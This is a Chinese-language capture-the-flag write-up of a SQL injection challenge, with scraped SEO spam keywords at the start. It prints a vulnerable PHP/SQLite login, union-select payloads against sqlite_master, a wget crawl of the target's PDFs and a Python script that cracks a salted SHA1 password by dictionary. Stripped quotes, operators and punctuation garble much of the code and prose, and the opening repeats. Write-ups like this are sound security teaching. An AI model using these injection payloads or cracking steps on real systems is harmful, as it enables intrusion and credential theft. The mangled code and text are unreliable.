3深圳网站建设,设计网页英语,邯郸最新消息,橙云 php网站建设该题考察SQL注入 正文
后台扫到robots.txt
页面内容如下#xff1a; 进入login.php 页面源代码如图#xff1a; 传参debug得到php代码#xff1a; ?php
if(isset($_POST[usr]) isset($_POST[pw])){$user $_POST[usr];$pass $_POST[pw];$db new SQLite3… 该题考察SQL注入 正文
后台扫到robots.txt
页面内容如下 进入login.php 页面源代码如图 传参debug得到php代码 ?php
if(isset($_POST[usr]) isset($_POST[pw])){$user $_POST[usr];$pass $_POST[pw];$db new SQLite3(../fancy.db);$res $db-query(SELECT id,name from Users where name.$user. and password.sha1($pass.Salz!).);if($res){$row $res-fetchArray();}else{echo brSome Error occourred!;}if(isset($row[id])){setcookie(name, .$row[name], time() 60, /);header(Location: /);die();}}if(isset($_GET[debug]))
highlight_file(login.php);
? pass变量拼接Salz并且经过sha1加密后与password进行比较
所以思路是SQL注入把pass找出来注意这里的数据库是SQLite数据库
先判断注入点个数 所以注入点个数为2
接着查表名 union select 1,name from sqlite_master where typetable--接着查SQL查询语句 CREATETABLEUsers%28idintprimarykey%2Cnamevarchar%28255%29%2Cpasswordvarchar%28255%29%2Chintvarchar%28255%29%29 格式化 接着利用 limit 进行移位查询 结果如下 推测favword在之前的英文页面中于是使用kali把页面都下载下来
wget ip -r -np -nd -A .pdf接着写脚本将每个词都与Salz拼接进行加密看是否匹配3fab54a50e770d830c0416df817567662a9dc85c
from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlibdef get_pdf():return [i for i in os.listdir(./) if i.endswith(pdf)]def convert_pdf_2_text(path):rsrcmgr PDFResourceManager()retstr StringIO()device TextConverter(rsrcmgr, retstr, codecutf-8, laparamsLAParams())interpreter PDFPageInterpreter(rsrcmgr, device)with open(path, rb) as fp:for page in PDFPage.get_pages(fp, set()):interpreter.process_page(page)text retstr.getvalue()device.close()retstr.close()return textdef find_password():pdf_path get_pdf()for i in pdf_path:print Searching word in ipdf_text convert_pdf_2_text(i).split( )for word in pdf_text:sha1_password hashlib.sha1(wordSalz!).hexdigest()if sha1_password 3fab54a50e770d830c0416df817567662a9dc85c:print Find the password : wordexit()if __name__ __main__:find_password()得到favword为ThinJerboa即pass为ThinJerboa
在admin.php传参即可 得到flag
